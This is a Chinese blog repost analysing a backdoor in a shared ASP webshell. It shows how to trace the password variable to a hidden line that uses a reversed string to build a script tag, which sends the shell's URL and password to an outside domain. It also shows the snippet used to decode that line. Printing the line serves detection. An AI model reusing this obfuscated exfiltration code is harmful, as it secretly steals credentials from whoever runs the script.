欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

webshell后门分析第二篇

程序员文章站 2022-09-28 11:42:12
看到这篇先看第一篇:http://www.2cto.com/Article/201306/219719.html           &...
看到这篇先看第一篇:http://www.2cto.com/Article/201306/219719.html

             今晚又有学员发来一只马 现在asp的马 基本都是同一只马修改出来的 检测原理大致相同。

如图:这只马大家都有:我就不发了

webshell后门分析第二篇

技术好点的 肯定将后门加密才发出来。

             今天这只又没有加密

             按照上次的检测流程 找到 上次的地方 看了一下没有问题。

1 if session("KKK")<>UserPass then

2 if request.form("pass")<>"" then

3 if request.form("pass")=UserPass then

4 session("KKK")=UserPass

5 if instr(url,lcase("lpt"))<0 then

6 response.redirect url

7 else

这次估计是像以前的老方法收信。

比较好找现在webshell的后门内基本都是把密码的字段 传入来进行判断。

所以只要跟踪UserPass 基本都能找到收信的网址:

很多的时候都需要字符串

1 acodee="=u?/moc.81sid.d//:ptth'=crs tpircs<":Efun=StrReverse(acodee):Efun=Efun&uu&"&p="&userpass&"'></script>

StrReverse 这个是字符串反串的意思 新建一个asp文件 输出看看就行了

1 <%

2 acodee="=u?/moc.81sid.d//:ptth'=crs tpircs<":Efun=StrReverse(acodee):

3 Response.Write(Efun):

4 %>

webshell后门分析第二篇

 

u是传进来的密码

很简单吧 。。。。。。。。。。。。。。。。。。。。。。。。。。。